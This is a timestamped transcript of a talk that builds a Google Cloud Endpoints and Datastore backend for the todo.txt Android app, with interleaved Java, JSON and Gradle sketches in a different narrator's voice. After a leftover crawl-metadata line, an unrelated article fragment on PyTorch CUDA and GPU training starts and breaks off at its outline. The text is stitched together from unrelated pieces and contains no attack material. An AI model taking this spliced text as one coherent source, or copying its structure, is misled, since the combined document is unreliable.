sayHi, and I'm gonna take a parameter that I call name.
- 19:59
This is really basic, very, very elementary stuff.
- 20:02
But it's just creating an, an elementary endpoint for me.
- 20:06
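As a plain-Java sketch, that generated endpoint boils down to something like this (the @Api and @ApiMethod annotations from the Endpoints SDK are shown only as comments so the sketch stands alone):

```java
// Sketch of the generated "hello" endpoint, minus the Endpoints SDK.
// In the real generated code, @Api marks the class as a Cloud Endpoints
// API and @ApiMethod exposes sayHi over HTTP.
class MyBean {
    private String data;

    public String getData() { return data; }
    public void setData(String data) { this.data = data; }
}

// @Api(name = "myApi")
class MyEndpoint {
    // @ApiMethod(name = "sayHi")
    public static MyBean sayHi(String name) {
        MyBean response = new MyBean();
        response.setData("Hi, " + name);
        return response;
    }
}
```

Calling sayHi with a name hands back a bean whose data is "Hi, " plus that name, which matches the response the APIs Explorer shows in a moment.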
So, why don't I go ahead and run that, and let's see what it looks like.
- 20:09
So I'm just gonna change my profile to the backend and run it.
- 20:11
[SOUND] And switch into my
- 20:17
browser, when it runs.
- 20:23
So, we see the scrolling on the left here, it shows my dev app server's now running.
- 20:28
So I'm gonna come in here and I'm just gonna go, it runs on localhost 8080.
- 20:31
And then I'm gonna take a look and this is just that basic app that written for me.
- 20:36
But I wrote an endpoint and I wrote an API with that endpoint.
- 20:39
So how do I access that endpoint?
- 20:40
How do I access that API?
- 20:42
Well there's a, if you postfix it with _ah/api/explorer.
- 20:46
It does a little bit of magic and what that does is that
- 20:49
if you're familiar with App Engine, App
- 20:52
Engine applications run on something dot appspot.com.
- 20:56
So we've pre-written this application called
- 20:59
APIs Explorer, which is running on apisexplorer.appspot.com.
- 21:03
So when I browsed into my local API, but I used that postfix on the end
- 21:08
of it, what's happening is the application on
- 21:10
APIs Explorer is going and taking a look at my metadata.
- 21:13
Parsing that out and building a web client for me.
- 21:16
So this is my web client, and remember, when I had the
- 21:18
attribute I called the API myApi, which is why it's called that here.
- 21:23
And if you remember I had my method, I called it sayHi,
- 21:25
so I clicked that and that's why it's called that here.
- 21:28
And I'll just come in and say, I don't know, future insights and execute it.
- 21:34
So now you can see it's just doing a post to my local host on
- 21:38
this. Sorry, let me see if I can zoom in, that is a little small.
- 21:43
Anybody remember how to zoom in Chrome, I can never remember how.
- 21:45
There we go.
- 21:47
Yeah.
- 21:47
All
- 21:50
right, let's see if that looks a little better.
- 21:54
Okay, so you can see I just did a post to
- 21:56
my endpoints, and then I got the response back, "Hi, future insights."
- 22:00
So this is the server running on my local machine right
- 22:03
now, that very, very simple API that I had defined, and the
- 22:06
cloud endpoint for that API having client libraries for a web client
- 22:11
being generated for it, and then this API Explorer talking through those endpoints.
- 22:15
If I go back to my code, you'll see that it was
- 22:18
a very simple hello world so, you know, it's taking in a string
- 22:21
name, I passed in future insights, it's generating a bean from that and
- 22:26
it's just setting the data to be "Hi, " plus the name and then returning that.
- 22:30
And you will see that the API method was called sayHi, so.
- 22:34
Very simple example that's just a hello world kind of
- 22:37
thing, but there's a whole lot of infrastructure underlying this.
- 22:40
And this kind of infrastructures, what you
- 22:41
can build to have your more scalable applications.
- 22:44
So now, what we're doing here is we're
- 22:46
taking this todo.txt application and we're rebuilding that for the cloud backend.
- 22:50
So let me start doing that.
- 22:51
So first of all.
- 22:52
Instead of just using MyBean, I'm gonna refactor it.
- 22:56
So refactoring tools if you are a
- 22:58
Java developer are absolutely priceless, because Java has
- 23:01
some constraints like your class name has
- 23:03
to have the same filename et cetera [INAUDIBLE].
- 23:05
So if I have a bean called TaskBean.
- 23:07
So, I'm just going to refactor it, so you can see over here,
- 23:11
I know it's a little small, that it was renamed to TaskBean.
- 23:16
And then I'm just gonna add some code to this, so every task needs an id.
- 23:21
So I'm gonna add a private long id to this and
- 23:28
you need a getter and setter for this, and one of the
- 23:30
things I like about the tools is that there's some generation
- 23:32
in here, so I just right-click on my id, say Generate.
- 23:36
Ask for the getter and setter I say, id long, and
- 23:38
then the getter and setter have been generated for me on there.
- 23:41
Just a nice little shortcut if you're coding these kinds of things.
- 23:44
Now I've got an id and I've got a string on
- 23:46
it, so that's good enough for my task, but I need to change my endpoint, right.
- 23:50
This endpoint that just says hi
- 23:54
is no good for actually rebuilding my todo.txt.
- 23:58
So I'm going to cheat a little bit.
- 24:00
Instead of having you watch me type all the code.
- 24:03
I have a little macro. One of the things again, with the tools,
- 24:07
you can pre-define macros, so I have a macro that I call App Engine Task.
- 24:10
When I type in that macro, what it does
- 24:13
is just paste in the code that I had typed earlier on.
- 24:15
So what this has is, there are three methods.
- 24:18
One for storing a task in the cloud.
- 24:20
One for getting all my tasks out of the cloud,
- 24:22
and one for clearing the tasks that are actually there.
- 24:24
Now you'll notice that when I put this code in, there are a number
- 24:28
of code words here that are being highlighted
- 24:31
in red such as entity and set property.
- 24:33
So the nice thing about the tools here is
- 24:35
that they will try to automatically do imports for you.
- 24:38
So as you start typing a code, if it recognizes, for example,
- 24:41
datastore service, it will add the correct import for me for datastore service.
- 24:46
But the problem with that of course is if you got
- 24:48
multiple imports that it recognizes that matches the keyword, in this
- 24:52
case entity, it says, I don't know what to import for
- 24:54
this, so it highlights it in red, just so that you know.
- 24:57
So I just wanna go through and fix some of these.
- 24:59
So if I.
- 25:00
I'm doing command one on this and then it's saying,
- 25:02
hey look, you know, you probably want to import this class.
- 25:05
So I import the class.
- 25:06
And then it's gonna tell me it's found all of these different entities.
- 25:09
Which one should I use?
- 25:10
Well, I just happen to know that the
- 25:12
one that I wanna use is the appengine.api.datastore.entity.
- 25:16
So I'm gonna go ahead and use that one.
- 25:17
And then just scroll down through my code and just make sure I've got all of them.
- 25:20
You can see List here, and the List I believe I want is java.util.List.
- 25:26
So I'm gonna come in here and say java.util.List, and for my query,
- 25:30
I'm querying from an app engine datastore, so I'm just going
- 25:34
to, whoops, I'm just gonna import the app engine datastore query.
- 25:37
Where's that.
- 25:40
This one, and then my FetchOptions should be
- 25:43
my last one, and that's also the datastore FetchOptions,
- 25:46
so I'm holding down Command, hitting 1, just to get
- 25:49
this menu, and I'm gonna use the datastore FetchOptions.
- 25:52
So now I know all my code is good, all my imports have been resolved.
- 25:55
So let's take a quick look at the code
- 25:57
for just storing this data in the cloud.
- 25:59
Okay, so first of all, I have a method that I call storeTask.
- 26:04
In my todo.txt app, I create a task,
- 26:08
and then I wanna store that task in the cloud for later retrieval.
- 26:11
So how do I store that?
- 26:12
First of all, I'm just creating a datastore service.
- 26:15
Datastore, Cloud Datastore, is a NoSQL-based data
- 26:18
storage system that comes as part of Google Cloud.
- 26:21
So just the API for that is in a datastore service.
- 26:24
I'm creating a transaction, and then on
- 26:26
that transaction I have to store an entity.
- 26:30
So, when you store something in datastore, you don't store just a pure
- 26:33
string, or a pure int or a pure [UNKNOWN] or something like that.
- 26:36
You create an entity, that entity then has name value pairs
- 26:40
for your data and then you store that entity within the datastore.
- 26:43
So I'm just creating an entity here that I'm calling a
- 26:46
TaskBean, and the entity's id is just gonna be the same
- 26:49
as the id of the task and then I've only got
- 26:52
one property on my task and that's the string defining the task.
- 26:55
And on the task entity I'm just gonna set name value pair.
- 26:58
I'm just gonna call it data and I'm gonna set it
- 27:01
to be the data from the actual bean, from the task bean.
- 27:04
And if you remember, the TaskBean was just this guy, where I just had
- 27:07
a long and I had a string, and I had getters and setters for them.
- 27:10
So it's very straightforward: I just
- 27:13
create a handle on my datastore,
- 27:15
I create an entity to store in that datastore and then I set up that
- 27:19
entity with the details for the task that I want to store in the datastore.
- 27:22
And then I just store it, and it's in a transaction so I commit it; I use a
- 27:26
.put to store the entity and because it's a transaction
- 27:29
if something goes wrong I can always roll it back.
- 27:30
So pretty straightforward.
- 27:32
So now the next thing.
- 27:33
Well, first of all, wait a second.
- 27:34
I've got a red underline.
- 27:35
I don't know how well you can see it on the screen, on .getTasks.
- 27:38
So usually a red underline is indicating some kind of an
- 27:41
error and this tooltip, I'm sorry, is really tiny.
- 27:43
But this is the [INAUDIBLE] going on that I was talking about.
- 27:45
It's telling me that I shouldn't prefix APIs with a dot.
- 27:50
So because otherwise when I'm calling it, I
- 27:52
might be calling client..getTasks, which would be wrong.
- 27:55
So I'm just going to get rid of that dot, and then the [UNKNOWN] goes away.
- 27:58
So it's just checking my code styling, making sure I'm doing things right.
- 28:02
And it goes away, and it allows me to continue.
- 28:04
So now the next thing is I've stored all these tasks, one by one.
- 28:08
And when I launch my app, I might want
- 28:09
to see all the tasks that are available to me.
- 28:12
Usually if I wanna look at my to do list, I wanna see everything on my to do list.
- 28:15
So this is very similar code to what we just saw.
- 28:17
I have a datastore service.
- 28:19
I have, I'm creating a key into this datastore
- 28:22
service and then I'm querying it based on that key.
- 28:25
Now when you query a datastore, you don't
- 28:27
use SQL, because it's a NoSQL-style database.
- 28:30
So if I create a query, and I specify the entities that
- 28:34
I want in that query, and I provide no further parameters, I get everything.
- 28:38
And that's because here I just wanna get everything, so I'm creating that key.
- 28:42
And on the datastore service, I'm just saying.
- 28:45
Prepare that query, give me everything in that query and send it back as a list.
- 28:49
That list then gets loaded into a list of Entity, and
- 28:52
then, remember, Entity is how we store things in the datastore,
- 28:56
but our client is using task beans, so I now want
- 28:59
to turn that list of entities into a list of task beans.
- 29:03
So I create an array list of task beans and
- 29:05
then I just cycle through my entities, reading out the id.
- 29:08
Reading out the data and then setting them on the appropriate task bean.
- 29:12
So, remember, the datastore just uses entities.
- 29:14
I don't store my beans directly, and that's why I just
- 29:16
gotta do this kinda translation tier in between the two of them:
- 29:20
read out all the entities, get the data from those entities,
- 29:22
use that to create task beans and then return those task beans.
- 29:26
And then finally I have clearTasks, which is just to
- 29:30
get rid of everything, to wipe out my datastore,
- 29:33
and it's the same kind of thing I'm just gonna query
- 29:35
everything and then go through everything and delete them one by one.
- 29:39
So if I have 20 tasks in there, it's just gonna give me back this list of entity
- 29:43
results, which will have all 20 of them, and then
- 29:44
I just cycle through and delete them one by one.
- 29:46
And then put that into a transaction and then off we go.
- 29:50
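The three methods he just walked through can be sketched in plain Java, with a LinkedHashMap standing in for the Cloud Datastore. In the real code each mutation is wrapped in a datastore Transaction and stores Entity objects with name-value pairs; both are elided here so the sketch runs on its own:

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

// Mirrors the bean from the talk: a long id plus a string of data.
class TaskBean {
    private long id;
    private String data;

    public long getId() { return id; }
    public void setId(long id) { this.id = id; }
    public String getData() { return data; }
    public void setData(String data) { this.data = data; }
}

// In-memory stand-in for the three endpoint methods.
class TaskApiSketch {
    // id -> data, playing the role of entities keyed in the datastore
    private final Map<Long, String> store = new LinkedHashMap<>();

    public void storeTask(TaskBean task) {
        // Real version: new Entity("TaskBean", id), setProperty("data", ...), put
        store.put(task.getId(), task.getData());
    }

    public List<TaskBean> getTasks() {
        // Real version: an unfiltered Query over the "TaskBean" kind,
        // translated entity by entity back into beans
        List<TaskBean> result = new ArrayList<>();
        for (Map.Entry<Long, String> e : store.entrySet()) {
            TaskBean bean = new TaskBean();
            bean.setId(e.getKey());
            bean.setData(e.getValue());
            result.add(bean);
        }
        return result;
    }

    public void clearTasks() {
        // Real version: query everything and delete the entity keys one by one
        store.clear();
    }
}
```

The translation tier he mentions is the loop in getTasks: entities out of the store, beans back to the client.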
Okay.
- 29:50
So shall I run this and let's see what it looks like.
- 29:54
So if I run this backend now.
- 29:57
I just get this warning cuz I was already running something on
- 30:00
my local server, so I'm just gonna say stop it and rerun it.
- 30:03
And then give that a moment to run.
- 30:04
[BLANK_AUDIO]
- 30:10
Is it running?
- 30:12
Hit
- 30:15
C, switch back to Chrome and I'll say, localhost
- 30:18
8080 again and I'll go to the API Explorer.
- 30:25
Oops.
- 30:25
Not running yet.
- 30:32
Hm.
- 30:33
Give me one second.
- 30:34
Let's try that again.
- 30:43
So I've built my endpoint.
- 30:53
Maybe just rebuild and see if it works.
- 30:56
I'm getting an error somewhere.
- 31:05
[BLANK_AUDIO]
- 31:22
Sorry about this, just give me a second.
- 31:25
There's an error running the endpoints client.
- 31:27
Hm.
- 31:29
Okay, I'll move on.
- 31:30
I'll demo that one a little bit later.
- 31:31
Let me just see what happened there. Okay, so.
- 31:38
Threw me off a little bit.
- 31:40
Okay so, when I generate the endpoints for this first.
- 31:46
So what I've built with the cloud service, I'll try and get that running in a moment.
- 31:49
But before I build that, then I have client libraries
- 31:51
that are gonna access that, so let me build those guys.
- 31:54
So if I come in again here to Google Cloud Tools and
- 31:57
I say Generate Endpoint, I'm going to have some endpoints generated for me.
- 32:02
Now those endpoints are generated by a Google service.
- 32:04
It's gonna come in take a look at the code that I've written.
- 32:06
Take a look of how I've attributed them.
- 32:08
Build those classes for me and then store those classes in my Maven Repository.
- 32:12
I do have a backup project in case this one doesn't work.
- 32:15
And actually you know, I'm gonna go right to that one.
- 32:18
So.
- 32:20
[SOUND] This is the danger of
- 32:25
working with preview software
- 32:30
by the way, you see I'm in
- 32:35
preview 0.6 right now.
- 32:40
Okay, so I'll go back to my backend.
- 32:44
Let me run that.
- 32:45
[BLANK_AUDIO]
- 32:57
Okay.
- 32:58
There we go.
- 32:59
So, if you recall, I built the task
- 33:01
API, and then I had the three methods within that.
- 33:03
clearTasks, getTasks, and storeTask.
- 33:06
So I just come in and execute this clear task.
- 33:08
Doesn't require anything to be done.
- 33:09
So, it doesn't require any parameters.
- 33:11
It's just gonna clear everything.
- 33:13
So I have cleared them, and if I
- 33:15
do get tasks, of course, it's gonna return something empty.
- 33:19
So now what happens if I try to store a task.
- 33:20
Now, if you remember, the task took an id and it took some data,
- 33:23
so I'm gonna go into the request body of the call that I'm making
- 33:27
to it and I'm just gonna give this task an id of one and I'm
- 33:31
going to give it a data of, I don't know, hello room, hope this works.
- 33:38
And I'm gonna execute that.
- 33:39
So now, you can see that taskApi.storeTask executed and we
- 33:43
can see, there was no response coming back from this.
- 33:45
I didn't write it to have any acknowledgment or anything
- 33:47
like that, but if, say, for example, if
- 33:49
I created another task and if I stored that task
- 33:53
and add a property and I am gonna say, id 2.
- 33:56
Say data second task, and I'm gonna
- 34:00
execute that, again that executes and now if
- 34:03
I go back and I take a look at my get tasks, and I just
- 34:06
execute the getTasks, we can see my response is coming back with the
- 34:09
JSON for all of my tasks, so that's the two tasks that I had put in.
- 34:14
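The getTasks response he's showing has roughly this shape; the field names come from the TaskBean, but the exact JSON envelope here is approximate:

```json
{
  "items": [
    { "id": "1", "data": "hello room, hope this works" },
    { "id": "2", "data": "second task" }
  ]
}
```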
So that's how the API is actually running on the backend.
- 34:16
Of course it's still on my localhost.
- 34:18
I'm gonna deploy it to the cloud in a few moments.
- 34:20
But before I do that, the first thing I would have to do
- 34:23
is to build the client libraries, so that my Android application can access them.
- 34:27
So let's take a quick look at that.
- 34:30
So before I ran this demo, I showed a demo.
- 34:33
Just the tooling, where I was up here
- 34:35
and I said tools, Google Cloud Tools, Generate Endpoint.
- 34:39
Now what that does is that it builds those client libraries for me.
- 34:43
It jars them up and then it sticks them in my local Maven Repository.
- 34:46
So if I go take a look at my local Maven Repository, if I open my terminal.
- 34:53
Let me just open one with a bigger font.
- 34:59
Here we go.
- 35:00
So, I'm gonna go in my Maven Repositories and cd /user/ [UNKNOWN] /.m2/repository.
- 35:10
Okay.
- 35:11
Now, if you remember earlier on when I was
- 35:13
creating my backend, I had a namespace com.google.stuff so
- 35:18
I'm just gonna cd into that, com.google, and what
- 35:23
was I calling it, I think it was tasks.
- 35:26
But a to do, backend or something.
- 35:29
Let me see.
- 35:31
Hm.
- 35:33
Sorry, just give me one second.
- 35:34
[SOUND] I'll go back to my code, I guess, and take a look.
- 35:41
It was oh, beg your pardon, it was com.todo txt wait, no, wrong one.
- 35:45
I'll look at my backend, and in my Java.
- 35:49
I had called the namespace com.google.todotxt.backend.
- 35:53
So I come back out here.
- 35:56
CD to do, oops, what
- 36:01
am I doing wrong?
- 36:02
CD com.
- 36:05
CD google.
- 36:11
Cd to do txt.
- 36:15
Cd backend.
- 36:16
There it is.
- 36:20
All right.
- 36:21
And if you remember, when I created my API and attributed it, I gave it the name.
- 36:26
I called it task API.
- 36:27
That's why we have a task API directory here.
- 36:30
And it's like CD into that.
- 36:31
Now I have these two things here:
- 36:33
maven-metadata-local, and this v1-1.18.0-rc-SNAPSHOT.
- 36:39
So that's the jarring up of my client files for me, the
- 36:42
tool that generated them, jarred them up and put it in that name.
- 36:45
So if I switch back to my Android Studio, in my client application,
- 36:51
which was called todotxt-touch, if I look at its build.gradle.
- 36:58
So this is one that I had done earlier on, but the dependencies I've added here, you
- 37:02
see, I'm just gonna add compile com.google.todotxt.backend
- 37:06
taskApi v1-1.18.0-rc-SNAPSHOT.
- 37:09
It's a bit of a mouthful.
- 37:10
But that's just, I'm instructing Gradle to pull in those jar files.
- 37:14
From my local Maven Repository.
- 37:16
And I've also just specified within Gradle to say I wanna use mavenLocal, so
- 37:20
pull in my local repositories so, this autogenerated
- 37:22
code is gonna get pulled into my application.
- 37:25
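Put together, the client-side build.gradle fragment he's describing looks roughly like this; treat the exact artifact coordinates as approximate, though the version string matches the snapshot jar above:

```groovy
// Roughly the shape of the client-side build.gradle changes.
repositories {
    mavenLocal()   // pull the generated client jar from ~/.m2/repository
}

dependencies {
    compile 'com.google.todotxt.backend:taskApi:v1-1.18.0-rc-SNAPSHOT'
}
```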
So now I've built my backend.
- 37:28
I've created an API in the backend, I've
- 37:30
created the client libraries for accessing that backend.
- 37:33
The last thing that I need to do, is
- 37:35
to build my client application to actually use these libraries.
- 37:39
So if you're familiar at all with the
- 37:41
Todo txt application, this will look pretty straightforward.
- 37:44
If not I'll just step through it.
- 37:47
So if I come into my source.
- 37:50
Within it, I'm opening the todotxt-touch.
- 37:53
Within my source, within the Java for this one, there's a set
- 37:58
of task libraries, and within these, there is what's called a TaskBagImpl.
- 38:04
So the author of todo.txt, she created this TaskBag
- 38:09
for managing tasks and for managing swapping them over and back.
- 38:12
Between Dropbox and the Android device itself.
- 38:16
And in this there were a couple of methods, that I
- 38:19
just wanna highlight; there's pushToRemote, here we go.
- 38:24
So, pushToRemote, remember Dropbox uses files, so in
- 38:29
pushToRemote there's a local file repository for the text file.
- 38:33
And, all they wanna do when they push to remote is to
- 38:36
take it out of the local repository and push it to Dropbox.
- 38:39
Very straightforward.
- 38:40
And when they wanna pull from remote, that's a case of
- 38:42
pulling a file from Dropbox, and pushing it into the local repository.
- 38:46
And then read from that to be able to generate your to do list.
- 38:50
But of course, we're using a cloud backend now.
- 38:52
We're using the API that I had created earlier on.
- 38:55
So the nice thing I can do
- 38:56
is just override this TaskBagImpl with one of my own.
- 39:01
So I've created this one, that I call the EndpointsTaskBagImpl.
- 39:05
So the cloud based backend with the API and the clients to access that.
- 39:09
I'm extending the original TaskBagImpl with this one.
- 39:14
And all this is gonna do, for push to remote and pull
- 39:16
from remote, is to use the API that I had just created.
- 39:19
So, let's take a quick look at that.
- 39:22
So first of all, you know, as I build my
- 39:24
TaskBag class, I created a TaskApi builder.
- 39:29
From my backend that I had created and I actually have a live one running on the
- 39:34
internet right now so I could, I'll just use
- 39:37
the live one rather than using my local one.
- 39:39
And that's at lmandroidtest.appspot.com.
- 39:43
So the same API with the three methods that I just showed you is running
- 39:47
there and I'm gonna create this [INAUDIBLE] called
- 39:50
task API service from the metadata in that.
- 39:52
And then I'm gonna use Task API service
- 39:55
with the push to remote and pull from remote.
- 39:58
So.
- 39:59
If you remember, when I went to pull from remote,
- 40:02
what I'm doing is I'm getting my full list of tasks.
- 40:05
So to get my full list of tasks what I've decided
- 40:07
to do is just, I'm gonna call the clearTasks API.
- 40:11
I'm sorry, when I'm pushing to remote, I'm gonna
- 40:14
push everything for my client up to the Cloud.
- 40:16
So what I'm gonna do is clear all my tasks from the Cloud.
- 40:19
By just calling taskApiService.clearTasks, and then take a look
- 40:23
at the tasks that I have locally within my
- 40:25
UI, and then create beans for them, and
- 40:28
call the storeTask for each one of those beans.
- 40:32
So again this is just my, just API calls now
- 40:34
on these class libraries which were auto generated for me.
- 40:37
And Ditto when I wanna pull from remote.
- 40:40
I'm just gonna go to the taskApiService, call
- 40:43
the getTasks on that, to get all of my tasks.
- 40:46
They were coming back as a list of task beans.
- 40:49
I used task beans also within my client application.
- 40:52
And now I can just render those tasks in my client application.
- 40:55
So for me, to change the backend from
- 40:57
Dropbox to the Cloud Endpoints, I'm just using
- 41:00
my API, I'm extending the TaskBagImpl,
- 41:03
which was from Dropbox, with this
- 41:06
EndpointsTaskBagImpl, so the last thing that I have to
- 41:08
do is just replace the code where they were
- 41:11
using the TaskBagImpl with something that uses
- 41:14
the EndpointsTaskBagImpl, and I should be good to go.
- 41:18
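The override he's describing can be sketched in plain Java like this; TaskApi stands in for the auto-generated client library (the real one is built with a builder, HTTP transport, and so on), the class and method names follow the talk, and an in-memory fake is included just to exercise the sketch:

```java
import java.util.ArrayList;
import java.util.List;

// Stand-in for the auto-generated Cloud Endpoints client.
interface TaskApi {
    void clearTasks();
    void storeTask(long id, String data);
    List<String> getTasks();
}

// Sketch of swapping the Dropbox-backed TaskBag for an Endpoints one.
class EndpointsTaskBag {
    private final TaskApi service;
    private final List<String> localTasks = new ArrayList<>();

    EndpointsTaskBag(TaskApi service) { this.service = service; }

    void addTask(String data) { localTasks.add(data); }

    // Push: wipe the cloud copy, then store every local task
    void pushToRemote() {
        service.clearTasks();
        long id = 1;
        for (String data : localTasks) {
            service.storeTask(id++, data);
        }
    }

    // Pull: replace the local list with whatever the cloud has
    void pullFromRemote() {
        localTasks.clear();
        localTasks.addAll(service.getTasks());
    }

    List<String> tasks() { return localTasks; }
}

// In-memory fake of the remote API, just for trying the sketch out.
class InMemoryTaskApi implements TaskApi {
    private final List<String> tasks = new ArrayList<>();
    public void clearTasks() { tasks.clear(); }
    public void storeTask(long id, String data) { tasks.add(data); }
    public List<String> getTasks() { return new ArrayList<>(tasks); }
}
```

The clear-then-store-everything pushToRemote matches the talk: it is a full replace of the cloud copy rather than an incremental sync.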
So let's see what will happen if I try to run this.
- 41:20
Hopefully it'll work.
- 41:21
So I'm just gonna run the clients application, the Android App.
- 41:24
And I'm gonna run it in the emulator, and hopefully my emulator is behaving.
- 41:30
All right.
- 41:30
[SOUND] So I'll give that a moment to run.
- 41:34
It's gonna ask where do I want to run it?
- 41:36
I'm just saying I'm gonna run it in my emulator.
- 41:38
Takes a moment to compile it and then deploy it to the emulator.
- 41:41
[BLANK_AUDIO]
- 41:49
Here was one that I was doing earlier on, just
- 41:52
when I was doing a dry run to test this.
- 41:54
So, let's see if she's running yet.
- 41:59
All right, so let me see what'll happen when I try to add a task to this.
- 42:02
So, somebody give me some text, something rough.
- 42:05
Anything.
- 42:07
Who's gonna win England versus Uruguay?
- 42:09
I know we all wanna go watch that.
- 42:12
England?
- 42:12
Okay.
- 42:13
Predicted score.
- 42:16
Wow, okay.
- 42:17
One nothing.
- 42:18
[LAUGH] A year ago I, just put something like that out there.
- 42:21
I'm gonna Save that task.
- 42:23
So it's adding that task in the UI to my Android App.
- 42:26
It's a little slow cuz it's an emulator.
- 42:28
And now it's gone and stored that in the Cloud also.
- 42:31
So, if I go to my Cloud endpoint, so I called it LM Android test.
- 42:36
So this, when you build an application in
- 42:40
App Engine, every application has a project ID.
- 42:43
And that project ID is what prefixes before the appspot.com.
- 42:46
So you can see here, I called it LMAndroidTest.appspot.com.
- 42:51
So if I come in here and I take a look at the API explorer
- 42:54
for that one, we see we have the same task API, that had deployed it.
- 42:58
And if I do a get tasks and execute it,
- 43:02
it's going up to the Cloud, it's going up to App engine and we can
- 43:06
see here, the task that I just created was stored in the Cloud for me.
- 43:10
And also, the way that todo.txt works
- 43:13
is that, if you pick a task and you say that
- 43:14
task is done, how it specifies that it's done is that
- 43:20
the todo.txt version of it, they
- 43:21
just prefixed the task with a lower-case x, and
- 43:25
so I haven't changed any of that code, so when it
- 43:26
would read it back, it would look for the lower-case
- 43:28
x, and you can actually see it there in the UI.
- 43:30
So I just said, hey look, this task is done and if I go back to my Cloud and I
- 43:35
do get tasks and execute it, I'm just doing the
- 43:38
same thing, I haven't overwritten any of their code for that.
- 43:40
And it just prefixed it with a lower case x
- 43:42
in the, the time and date for when it was done.
- 43:45
So that's all that it took. So there was one
- 43:47
little bug in my demo, sorry about that, but to
- 43:50
be able to build this out as to [UNKNOWN], to
- 43:52
build a backend that runs on App Engine,
- 43:55
that exposes an API that generates a client class for
- 43:59
that API and then consume that client class within an
- 44:01
Android application, there's a lot of steps there but what
- 44:04
that gives you is that flexibility of being able to.
- 44:06
Build things for the backend, and say if I was now porting todo TXT, to
- 44:10
run on iOS, or to run as a web client, I now have the ability to
- 44:14
generate those client libraries with the APIs that
- 44:17
I can consume from within them, instead of
- 44:19
having code written within my App, Android application
- 44:22
that was tightly bound to a back end.
- 44:25
So just a quick look back at the architecture.
- 44:28
So this was everything that we build like in the last 20 minutes or so.
- 44:32
So that back ends, using the Cloud data store, Cloud end points wrapping that,
- 44:36
Cloud libraries that talk to them and
- 44:38
then the methods that, communicate between them.
- 44:41
[SOUND] Future directions, some of the things that we're
- 44:44
looking at with Android Studio and with Cloud Endpoints.
- 44:46
So GCE is Google Compute Engine which is
- 44:49
our infrastructure as a service offering, where you
- 44:52
can run VMs in the Cloud, similar to AWS or any of the other
- 44:57
cloud providers.
- 44:58
Um, a better API management console.
- 45:00
So you saw that the console that I was using there for testing the APIs.
- 45:04
It's a little primitive.
- 45:05
It's a little ugly.
- 45:06
The test harness isn't the greatest.
- 45:08
We are working on improving that.
- 45:10
Improving the getting started experience and just on
- 45:12
boarding, making the tools a little bit cleaner.
- 45:14
We have some releases coming next week with some great improvements in that.
- 45:18
We're also within the API management console looking
- 45:21
at, how do we incorporate third party APIs?
- 45:24
So the console I was using there to test
- 45:26
my application was great, because I wrote that API myself.
- 45:29
But if I'm consuming somebody else's API, I would
- 45:31
really like the console to be able to do that.
- 45:33
So we're looking at integrating that as well.
- 45:35
And then also API analytics.
- 45:38
So there's some great stuff if you tune into.
- 45:41
All right, I know, if you're not going to Google I/O next
- 45:43
week, the keynotes are gonna be streamed online for free; I recommend you
- 45:47
tune in to the keynotes because some of the API analytics stuff that
- 45:50
they're gonna be showing, take a look, it's absolutely terrific.
- 45:53
And it's not just analytics from the business perspective, to say how
- 45:56
many people from where are doing it; it's deep analytics, so you can
- 45:59
take a look at the perf of your application, where are the
- 46:02
bottlenecks, what's going wrong, how do you improve it, that kind of thing.
- 46:04
And some more details are coming next week.
- 46:08
And that's it.
- 46:09
That was a quick wrap up.
- 46:11
So thanks everybody for coming, and if anybody
- 46:13
has any questions, I'm happy to take them now.
- 46:15
At the back here.
- 46:17
>> Yeah,
- 46:20
can you go back to your [INAUDIBLE] your simulator?
- 46:27
>> Sure.
- 46:27
>> [INAUDIBLE] X marks the spot.
- 46:28
>> [LAUGH] L, lower case x?
- 46:29
>> Yeah.
- 46:30
>> Like this, that's a good question.
- 46:31
Let's see.
- 46:32
Yeah, [LAUGH] the [UNKNOWN] it is gone, yeah!
- 46:37
>> [UNKNOWN].
- 46:38
>> Yeah, we'll have to feed that back to
- 46:41
the author of todo.txt cuz that's how her one works.
- 46:43
So huh, interesting!
- 46:45
It should maybe, filter that out.
- 46:46
And I wonder what would it be, if I did a capital x?
- 46:49
It probably would be okay, right?
- 46:51
Oops.
- 46:53
So I say, x marks the spot.
- 46:59
Even that one fails.
- 47:00
[LAUGH] Any other questions?
- 47:03
Over here.
- 47:06
>> [INAUDIBLE] >> Sir, can we get a microphone?
- 47:12
Sorry [INAUDIBLE] >> Okay, so App Engine is not free.
- 47:22
So App Engine is a paid service.
- 47:24
You pay as you use it.
- 47:26
But the end point.
- 47:28
Is part of that cost, so there's
- 47:29
no additional cost for actually running an Endpoint.
- 47:32
So if you build an application in Endpoints, you pay for, sorry.
- 47:35
Build an application in App Engine, you'll pay for the compute that you use
- 47:38
in running that application, like in the
- 47:40
One Direction, example that I used earlier on.
- 47:43
And, that's all that you will pay for.
- 47:44
You're not paying any additional for the end points on that.
- 47:47
And, actually for anybody, if one this is, if you want
- 47:50
to just drop me an e-mail sometime at that, I can get,
- 47:52
like, about $500 in free App Engine credits if anybody's interested in
- 47:56
it, just to kick their tires and building stuff on App Engine.
- 48:01
So.
- 48:02
Any other questions?
- 48:04
Eric.
- 48:04
>> [INAUDIBLE].
- 48:12
>> I believe some of that is actually next week,
- 48:16
preview next week, as far as I know I'm not too familiar with that one, but the,
- 48:21
the bundling up a whole bunch of things to
- 48:23
either launch or have in preview for Google IO.
- 48:25
And I think that's one of them.
- 48:30
Any others.
- 48:31
All good.
- 48:32
Okay, well thank you everybody, and enjoy the game.
- 48:35
[SOUND] | https://teamtreehouse.com/library/a-guide-to-simplicity-creating-web-backends-for-web-and-mobile-clients | CC-MAIN-2016-50 | refinedweb | 11,988 | 86.74 |
A step-by-step guide including a Notebook, code and examples
AI and Deep Learning (DL) have made a lot of technological advances over the last few years. The industry itself has grown rapidly, and has been proven to transform enterprises and daily life. There are many deep learning accelerators that have been built to make training more efficient. Today you’ll learn how to accelerate deep learning training using PyTorch with CUDA.
Why use GPU over CPU for Deep Learning?
There are two basic neural network training approaches. We might train either on a central processing unit (CPU) or graphics processing unit (GPU).
As you might know, the most computationally demanding part of a neural network is its many matrix multiplications. In general, if we train on a CPU, operations are executed one after the other. By contrast, a GPU can execute many of these operations at the same time.
This is the main advantage of GPU over CPU: it is much faster. So, if you want to train a neural network, please use a GPU, as it will save you a lot of time and frustration.
How to maximize your GPUs using CUDA with PyTorch
This article is dedicated to using CUDA with PyTorch. I will try to provide a step-by-step comprehensive guide with some simple but valuable examples that will help you to tune in to the topic and start using your GPU at its full potential.
In this article we will talk about:
- What is PyTorch?
- Deep learning frameworks, Tensorflow, Keras, PyTorch, MxNet
- PyTorch CUDA Support
